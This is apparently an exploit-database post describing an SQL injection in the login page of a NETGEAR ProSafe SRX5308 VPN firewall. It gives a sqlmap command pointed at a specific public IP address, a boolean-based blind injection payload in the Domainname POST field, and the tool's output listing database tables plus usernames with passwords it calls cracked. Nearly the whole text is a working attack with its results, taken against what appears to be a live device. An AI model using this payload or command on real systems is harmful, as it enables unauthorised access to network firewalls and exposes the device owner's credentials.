# Exploit Title: NETGEAR ProSafe™ Gigabit Quad WAN SSL VPN Firewall SRX5308 | SQL Injection Vulnerability
# Author: Чингис хаан
# Tested On: Kali Linux
# sqlmap -u "https://95.128.69.5/scgi-bin/platform.cgi" --form --current-db --dbs --banner --batch
---------------------------------------------------------------------------------------------------
NETGEAR ProSafe™ Gigabit Quad WAN SSL VPN Firewall SRX5308
NETGEAR ProSafe™ - NETGEAR Configuration Manager Login
https://95.128.69.5/scgi-bin/platform.cgi
---
Parameter: USERDBDomains.Domainname (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: thispage=index.htm&USERDBUsers.UserName=oTcy&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain' AND 2477=2477 AND 'GOgI'='GOgI&button.login.USERDBUsers.router_status=Login&Login.userAgent=SmwH
Vector: AND [INFERENCE]
---
the back-end DBMS: SQLite
the back-end DBMS is SQLite
current user is DBA: True
available databases [1]:
[+] SQLite_masterdb
Database: SQLite_masterdb
[4 tables]
+----------+
| system |
| logging |
| services |
| zones |
+----------+
passwd and shadow encryption cracked
+---------------------+
| username | password |
+----------+----------+
| showid | password |
+----------+----------+
| guest | password |
+----------+----------+